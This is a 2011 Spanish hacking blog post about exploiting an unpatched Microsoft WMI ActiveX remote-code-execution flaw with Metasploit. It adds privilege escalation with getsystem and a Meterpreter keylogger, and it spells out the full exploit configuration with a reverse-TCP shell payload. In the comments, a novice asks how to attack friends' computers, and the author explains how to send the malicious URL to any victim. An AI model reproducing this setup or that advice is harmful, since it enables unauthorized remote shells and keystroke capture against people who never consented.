20 ene. 2011

[Video Metasploit] Vulneravilidad WMI - Escala de privilegios - Keylogger

Hace no tanto en Metasploiter.com han publicado un video de como sacarle provecho a una vuneravilidad [Microsoft WMI Administrative Tools ActiveX Control Remote Code Execution Vulnerability] (un bug bastante nuevo que no tiene parche por ahora) con Metasploit, en el video se muestra como manipular el exploit (la manipulación estandar: use exploit... set SRVHOST 193... etc, etc...) con el agregado de Escala de Privilegios (getsystem) y por último como activar la opción Keylogger desde Meterpreter (run keylogrecorder).

[Videotuto] WMI exploit+getprivs+keylogger




Un pequeño Recordatorio para que no se pierdan con Metasploit ;)
use exploit/windows/... (Exploit que vamos a utilizar)
set SRVHOST 192.129.180.132 (IP local donde va a montar el servicio)
set SRVPORT 8080 (Puerto local del servicio)
set URIPATH xxx03 (Uri del servicio ex. http://192.129.180.132/xxx03)
set payload windows/shell/reverse_tcp (Payload que vamos a utilizar) 
set LHOST 192.129.180.132 (IP donde se conectará la víctima)
set RHOST 192.129.180.132 (IP o host del objetivo)
set LPORT 80 (Puerto local de escucha) 
exploit (Ejecutamos el exploit)

[+] Salu2
[+] Si quieren dejan sus preguntas y/o peguen sus errores a ver si los puedo ayudar ;) (Espero XD)

Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.

10 Notaciones:

  1. ok bro sigo tu blog desde hase mucho y tambien usao backtrak desde hase mas de un mes tengo 4 finall
    tengo actualizado ala vercion 3.6 el metaxploit el probelma es el siguiente quise haser funcionar lo del video ok todo bien pero ala hora de lanzar el exploit me tira un error
    [*] Exploit running as background job.

    [-] Handler failed to bind to 201.252.143.116:5555
    [*] Started reverse handler on 0.0.0.0:5555
    [-] Exploit exception: The address is already in use (201.252.143.116:8080).
    yo le puse la ip publica tal cual muestar el video me salta este error ahora lo probe con mi ip pribaday me dise esto otro aparte le cambie el puerto y me salta este error
    [*] Exploit running as background job.

    [*] Started reverse handler on 10.0.0.3:5555
    [-] Exploit exception: The address is already in use (201.252.143.116:8080)

    ok el problema es que podra ser ya e buscado info por todos lasdos y no logro resolverlo talves sea que antes ejecute un xploit creo que lo hise mal y es como que me lo toma al anteriro exploit.
    weno espero que puedas hayudarme

    ResponderEliminar
  2. Hola!!
    Permiteme presentarme soy Melannie, administradora de un directorio de blogs, visité tu sitio y está genial,
    me encantaría poner un link de tu blog en mi sitio web y por mi parte te pediría un enlace hacia mi web y asi beneficiar ambas webs con más visitas.
    Si estas de acuerdo no dudes en escribirme a [email protected]

    Éxitos con tu blog.
    Un Saludo
    Melannie.

    ResponderEliminar
  3. holaaa soy algo nuevoo usandoo metaesploit y me gustariaa sabeer como utilizar los exploits k no sea en mi mismaa red oseaa quieroo utilizarloo a pc de amigoos y eso asii ...


    Saludos Graciaas!

    ResponderEliminar
  4. @Anónimo
    Que extraño viejo, debería funcionar... En todo caso el problema dice que ya está en uso esa IP con ese Puerto, intenta cambiando el puerto y revisando si tienes otra shell corriendo en Metasploit...
    [+] Salu2
    [+] Postea en caso de otro error, eso si voy a estar inactivo por 5 días ;)

    ResponderEliminar
  5. @Anónimo

    Novice: mira, el exploit al ser de conexión inversa (para evitar el firewall de Windows) se tiene que programar para que nuestra víctima se conecte a nosotros, por eso tienes que poner tu IP pública en "set LHOST" y luego al lanzar el exploit te saldrá una URL que tienes que enviar a tu víctima para que él se conecte a ti. De ese modo le puedes enviar la URL maliciosa a cualquier persona sin necesidad de saber su IP.
    [+] Salu2

    ResponderEliminar
  6. Me alegro de que os haya gustado el vídeo ;)

    Tienes un gran blog ZioneR, lo sigo a diario.
    Un saludo

    ResponderEliminar
  7. Una cosa podrias publicar bien el codigo porque no lo veo bien

    ResponderEliminar
  8. @Anónimo
    Toda la razón.. no sé como pasó, ya lo arreglé ;)

    ResponderEliminar
  9. Hola!

    Hace rato vengo siguiendo esta pagina, estoy suscrita a las publicaciones y ahora quisiera poder poner un enlace en mi blog sobre tu pagina. Espero contar con tu aprobacion. Por cierto he usado varios de tus post en mi foro.

    ResponderEliminar
  10. @Shelley

    Si quieres afiliarte pasa por http://www.blackploit.com/2010/06/afiliante-hacking-blackploit.html ...

    [+] Salu2

    ResponderEliminar

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (25) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (6) Hacking (18) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (193) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (145) Seguridad Web (140) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.